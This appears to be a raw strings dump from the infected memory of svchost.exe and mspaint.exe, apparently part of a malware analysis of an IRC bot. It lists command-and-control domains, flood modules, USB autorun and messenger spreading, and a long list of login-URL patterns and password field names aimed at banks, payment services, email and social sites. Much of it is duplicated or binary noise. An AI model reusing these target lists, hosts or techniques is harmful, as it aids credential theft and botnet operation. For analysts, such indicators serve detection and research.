[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
hXXp://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
/c "start %Ã%%.Trashes\%s
.Trashes
.Trashes
\\.\%c:
\\.\%c:
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.scr
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
URLDownloadToFileW
URLDownloadToFileW
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
hXXp://api.wipmania.com/
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
7 767
7 767
8*808;8~8
8*808;8~8
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
\mspaint.exe
\mspaint.exe
\svchost.exe
\svchost.exe
C:\Windows\system32\mspaint.exe
C:\Windows\system32\mspaint.exe
%s\Microsoft\%s.exe
%s\Microsoft\%s.exe
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
mspaint.exe
mspaint.exe
Aadvapi32.dll
Aadvapi32.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
svchost.exe_2060_rwx_001B0000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
Fv.TBv
Fv.TBv
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
-%sMutex
-%sMutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
hXXp://%s/%s
hXXp://%s/%s
hXXp://%s/
hXXp://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
hXXp://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
/c "start %Ã%%.Trashes\%s
.Trashes
.Trashes
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.scr
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
a.baerr000.ru
a.baerr000.ru
a.joerv06.com
a.joerv06.com
a.tsroxybaa.com
a.tsroxybaa.com
fbi.gov
fbi.gov
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
hXXp://api.wipmania.com/
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\312a36d2
\\.\pipe\312a36d2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 767
7 767
8*808;8~8
8*808;8~8
%s\Microsoft\%s.exe
%s\Microsoft\%s.exe
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
mspaint.exe
mspaint.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Windows\System32\svchost.exe
\Device\HarddiskVolume1\Windows\System32\svchost.exe
8C:\Windows\system32\svchost.exe
8C:\Windows\system32\svchost.exe
c:\%original file name%.exe
c:\%original file name%.exe
mspaint.exe_316:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
MFC42u.dll
MFC42u.dll
msvcrt.dll
msvcrt.dll
COMDLG32.dll
COMDLG32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
SHLWAPI.dll
SHLWAPI.dll
PROPSYS.dll
PROPSYS.dll
RPCRT4.dll
RPCRT4.dll
WINMM.dll
WINMM.dll
VERSION.dll
VERSION.dll
Bv.TBv
Bv.TBv
%s#IZ
%s#IZ
j SSSSSSSh
j SSSSSSSh
t;Ht.Ht!Ht
t;Ht.Ht!Ht
COMDLG32.DLL
COMDLG32.DLL
SSSSh
SSSSh
@t8HHt.Ht&Ht
@t8HHt.Ht&Ht
JtmJtXJtCJt.Jt
JtmJtXJtCJt.Jt
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
Ht\HtEHt.Ht
Ht\HtEHt.Ht
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
GdipSetPenLineJoin
GdipSetPenLineJoin
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
GetProcessHeap
GetProcessHeap
SetViewportExtEx
SetViewportExtEx
GetKeyboardLayout
GetKeyboardLayout
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
GetKeyState
GetKeyState
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
__crtLCMapStringW
__crtLCMapStringW
__crtGetStringTypeW
__crtGetStringTypeW
ShellExecuteExW
ShellExecuteExW
mspaint.pdb
mspaint.pdb
.PAVCObject@@
.PAVCObject@@
.PAVCException@@
.PAVCException@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCResourceException@@
.PAVCResourceException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCDummyCmdUI@@
.?AVCDummyCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCOperation@@
.?AVCOperation@@
.?AVCDrawAutoShapeOperation@@
.?AVCDrawAutoShapeOperation@@
.?AVCDrawShapeOperation@@
.?AVCDrawShapeOperation@@
.?AVCOperationStockImpl@@
.?AVCOperationStockImpl@@
.?AVCDrawRectAutoShapeOperation@@
.?AVCDrawRectAutoShapeOperation@@
.?AVCDrawPolygonOperation@@
.?AVCDrawPolygonOperation@@
.?AVCDrawBezierOperation@@
.?AVCDrawBezierOperation@@
.?AVCDrawLineOperation@@
.?AVCDrawLineOperation@@
.?AVCDrawStrokeOperation@@
.?AVCDrawStrokeOperation@@
.?AV?$CComObject@VCRTSPacketHandler@@@ATL@@
.?AV?$CComObject@VCRTSPacketHandler@@@ATL@@
.?AVCRTSPacketHandler@@
.?AVCRTSPacketHandler@@
.?AV?$StylusPluginImpl@UIStylusAsyncPlugin@@VCRTSPacketHandler@@@@
.?AV?$StylusPluginImpl@UIStylusAsyncPlugin@@VCRTSPacketHandler@@@@
.?AVCRTSStylusHandler@@
.?AVCRTSStylusHandler@@
name="Microsoft.Windows.Shell.mspaint"
name="Microsoft.Windows.Shell.mspaint"
version="5.1.0.0"
version="5.1.0.0"
Windows Shell
Windows Shell
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
KEYW
KEYW
3993831$5
3993831$5
lb_BB-%F
lb_BB-%F
e&;%fn
e&;%fn
Þp`,
Þp`,
.ET.0y
.ET.0y
.pppF
.pppF
/888 888
/888 888
>888)888
>888)888
9888#888
9888#888
888ˆ8/
888ˆ8/
888!888)8881
888!888)8881
888 888$888)88808884
888 888$888)88808884
3888(888
3888(888
7888&888
7888&888
888 888(8881
888 888(8881
888#888(888/8883
888#888(888/8883
>888;88878887888:
>888;88878887888:
2229222
2229222
2220222
2220222
888 888ˆ8 8881
888 888ˆ8 8881
9%%$"555
9%%$"555
